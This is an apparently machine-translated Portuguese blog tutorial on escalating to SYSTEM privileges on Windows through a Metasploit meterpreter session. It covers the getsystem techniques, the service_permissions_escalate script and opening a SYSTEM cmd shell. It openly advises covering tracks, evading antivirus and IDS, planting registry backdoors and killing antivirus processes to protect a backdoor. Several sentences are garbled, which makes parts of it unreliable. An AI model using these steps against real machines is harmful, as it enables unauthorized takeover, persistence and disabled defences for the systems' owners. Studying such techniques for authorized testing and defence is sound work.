Escalação de Privilegios com MetaSploit FrameWork

Uma vez que um atacante conseguiu engajar um alvo, provavelmente, as primeiras atividades a serem realizadas serão escalar privilégios para executar tarefas de gerenciamento no alvo, cobrir seus rastros e, finalmente, garantir que o acesso à máquina comprometida não seja interrompida, o que significa que, na medida do possível, deve evitar a detecção por sistemas AV, firewalls, IDS, etc.

Uma vez obtida uma consola meterpreter através de algum payload (tal como reverse_tcp) pode ser utilizado a extensão priv:

meterpreter> use priv
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to ’0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

Como você pode ver, existem diferentes técnicas utilizadas pela extensão priv para elevar os privilégios do console atual, você pode usar uma ou todas as técnicas, se nenhuma parametro é especificado, é utilizado todos os parametros:

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Depois de obter um console Meterpreter com privilégios apropriados pode executar algumas operações adicionais para acesso mais seguro a máquinas remotas comprometidos, mas é necessário para obter privilégios … comando anteriormente getSystem meterpreter foi utilizada e foi usado para incógnito “personificar “sessões de usuário, mas às vezes não é possível obter um console de” janelas de matérias “com privilégios de sistema adequado nestes casos tem o script service_permissions_escalate

meterpreter > run service_permissions_escalate

Este script irá abrir tantas sessões quanto possível metepreter através da pesquisa e coleta de licenças de acordo com os programas instalados no computador de destino, o comando, uma vez terminado, você pode fechar o console meterpreter que está aberto e abrir uma nova (tanto que criou o roteiro) e tente executar o comando:

meterpreter > execute -f cmd -i

Desta forma, você pode obter um console “raw” com permissões de sistema para realizar vários tipos de tarefas (como a definição de backdoors através de registro ou sistema AV off).

Depois de abrir este console você pode listar os processos em execução da máquina de destino com o comando tasklist e pode terminar qualquer um deles com o comando taskkill. Embora você possa ver os processos e até mesmo matar alguns deles, em alguns casos, pode haver processos são resistentes ou persistente a excluir prisão por mecanismos convencionais, como no caso de um antivírus potente que detecta malware e outras vulnerabilidades e ameaças podem colocar em risco o sistema, de modo que, nesses casos, é altamente recomendável, tente desativar o antivírus da sessão aberta para garantir que ele não vai destruir a traseira traseira estabelecida.

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s